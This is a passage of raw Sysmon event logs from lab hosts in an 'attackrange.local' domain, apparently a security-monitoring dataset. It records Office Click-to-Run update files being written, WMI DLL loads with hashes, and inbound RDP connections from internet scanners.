Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OCHelper.dll2021-04-20 14:54:10.081 11241100x800000000000000064202Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.081{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\NAME.DLL2021-04-20 14:54:10.081 11241100x800000000000000064201Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.081{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\NAMECONTROLPROXY.DLL2021-04-20 14:54:10.081 11241100x800000000000000064200Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.081{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MeetingJoinAxOC.dll2021-04-20 14:54:10.081 11241100x800000000000000064199Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.081{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSRTEDIT.DLL2021-04-20 14:54:10.081 11241100x800000000000000064198Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.081{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOHEVI.DLL2021-04-20 14:54:10.081 11241100x800000000000000064197Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:10.081{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOSREC.EXE2021-04-20 14:54:10.081 11241100x800000000000000064196Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.081{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOARIANEXT.DLL2021-04-20 14:54:10.081 11241100x800000000000000064195Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.081{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOARIACAPI.DLL2021-04-20 14:54:10.081 11241100x800000000000000064194Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.081{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOADFPS.DLL2021-04-20 14:54:10.081 11241100x800000000000000064193Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.081{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.ReportingServices.ReportDesign.Common.dll2021-04-20 14:54:10.081 11241100x800000000000000064192Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.081{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.ReportingServices.Interfaces.dll2021-04-20 14:54:10.081 11241100x800000000000000064191Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.081{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.ReportingServices.ReportDesign.Forms.dll2021-04-20 14:54:10.081 11241100x800000000000000064190Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.081{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.ReportingServices.RsClient.dll2021-04-20 14:54:10.081 11241100x800000000000000064189Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.081{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\ipcsecproc.dll2021-04-20 14:54:10.065 11241100x800000000000000064188Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.SqlServer.Configuration.SString.dll2021-04-20 14:54:10.065 11241100x800000000000000064187Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.SqlServer.Types.dll2021-04-20 14:54:10.065 11241100x800000000000000064186Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\DLGSETP.DLL2021-04-20 14:54:10.065 11241100x800000000000000064185Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ENVELOPE.DLL2021-04-20 14:54:10.065 11241100x800000000000000064184Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\OFFICE.dll2021-04-20 14:54:10.065 11241100x800000000000000064183Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\EMABLT32.DLL2021-04-20 14:54:10.065 11241100x800000000000000064182Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\DIFF_MATCH_PATCH_WIN32.DLL2021-04-20 14:54:10.065 11241100x800000000000000064181Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CONVERT\TRANSMGR.DLL2021-04-20 14:54:10.065 11241100x800000000000000064180Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Cpprest141_2_10.DLL2021-04-20 14:54:10.065 734700x800000000000000064179Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:10.050{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeC:\Windows\System32\wbem\wbemsvc.dll10.0.14393.4169 (rs1_release.210107-1130)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemsvc.dllMD5=2BE97028B7B85762561F475E31989C2A,SHA256=75C9D8C6D41B4B7D70666A8107A08A748CEF6CB9E60AD0288B10CDE12E274AFF,IMPHASH=200200BEAF933FA4627BF83C67BA473EtrueMicrosoft WindowsValid 11241100x800000000000000064178Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CONVERT\RM.DLL2021-04-20 14:54:10.065 11241100x800000000000000064177Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\AUDIOSEARCHLTS.DLL2021-04-20 14:54:10.065 11241100x800000000000000064176Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\AppSharingChromeHook64.dll2021-04-20 14:54:10.065 11241100x800000000000000064175Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\AutoHelper.dll2021-04-20 14:54:10.065 11241100x800000000000000064174Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\ReportingServicesNativeClient.dll2021-04-20 14:54:10.065 11241100x800000000000000064173Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\BIPLAT.DLL2021-04-20 14:54:10.065 11241100x800000000000000064172Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:10.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\AppSharingHookController64.exe2021-04-20 14:54:10.065 11241100x800000000000000064171Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSAEXP30.DLL2021-04-20 14:54:10.065 11241100x800000000000000064170Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\AUDIOSEARCHMAIN.DLL2021-04-20 14:54:10.065 11241100x800000000000000064169Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\AUDIOSEARCHSAPIFE.DLL2021-04-20 14:54:10.065 11241100x800000000000000064168Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Httpproxy.DLL2021-04-20 14:54:10.065 11241100x800000000000000064167Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\INKCOMMENT.DLL2021-04-20 14:54:10.065 734700x800000000000000064166Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:10.050{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeC:\Windows\System32\wbemcomn.dll10.0.14393.4283 (rs1_release.210303-1802)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemcomn.dllMD5=EF7A4C64E4A6F52AEAF20828033ADFF8,SHA256=7108BBAE5B91ED6784BD32547F7BD9DEAD392E47ACAB29DC057AEF7CFB746F3C,IMPHASH=3775C2F7CD09C385EEDA8CBB7894E3E3trueMicrosoft WindowsValid 11241100x800000000000000064165Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MAPISHELL.DLL2021-04-20 14:54:10.003 734700x800000000000000064164Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:10.050{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeC:\Windows\System32\wbem\wbemprox.dll10.0.14393.4169 (rs1_release.210107-1130)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemprox.dllMD5=B7B56FAC395BEEDC20120FD0170A23A3,SHA256=7BDF579D7348D84F251A8411E40E14ADF9406F954914C1C4DE30E880DCF6CEB3,IMPHASH=96416B54C1F2E15EF294753DF1CB4131trueMicrosoft WindowsValid 354300x800000000000000064163Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:08.209{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-23845-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064162Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:08.068{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com62757-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 11241100x800000000000000064161Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.003{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OFFRHD.DLL2021-04-20 14:54:10.003 11241100x800000000000000064160Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.003{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MINSBROAMINGPROXY.DLL2021-04-20 14:54:10.003 11241100x800000000000000064159Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.003{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MINSBPROXY.DLL2021-04-20 14:54:10.003 23542300x800000000000000049469Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:10.416{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF1211E64881074EC8A4CFCE142EF850,SHA256=49B6C0AF095BFD54C7A9EB4EBE83F0105221BB0575FF2DAA2271C6FBE154C52B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049468Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:07.718{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54616-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 11241100x800000000000000064339Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:11.925{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\IEContentService.exe2021-04-20 14:54:11.925 11241100x800000000000000064338Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:11.925{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msoev.exe2021-04-20 14:54:11.925 11241100x800000000000000064337Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:11.925{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msotd.exe2021-04-20 14:54:11.925 11241100x800000000000000064336Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:11.925{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SCANPST.EXE2021-04-20 14:54:11.925 11241100x800000000000000064335Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:11.925{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SCNPST32.DLL2021-04-20 14:54:11.925 11241100x800000000000000064334Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:11.925{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SCNPST64.DLL2021-04-20 14:54:11.925 11241100x800000000000000064333Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:11.925{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SCNPST64C.DLL2021-04-20 14:54:11.925 11241100x800000000000000064332Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:11.909{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ORGCHART.EXE2021-04-20 14:54:11.909 11241100x800000000000000064331Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:11.909{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\misc.exe2021-04-20 14:54:11.909 11241100x800000000000000064330Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:11.800{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\lynchtmlconv.exe2021-04-20 14:54:11.800 11241100x800000000000000064329Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:11.800{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\UcMapi.exe2021-04-20 14:54:11.800 11241100x800000000000000064328Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:11.800{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOSYNC.EXE2021-04-20 14:54:11.800 11241100x800000000000000064327Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:11.784{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSQRY32.EXE2021-04-20 14:54:11.784 11241100x800000000000000064326Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:11.284{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.MashupEngine.Library45.dll2021-04-20 14:54:11.284 11241100x800000000000000064325Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:11.284{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Storage.XmlSerializers.dll2021-04-20 14:54:11.284 11241100x800000000000000064324Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:11.284{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.ProviderShared.dll2021-04-20 14:54:11.096 11241100x800000000000000064323Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:11.096{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 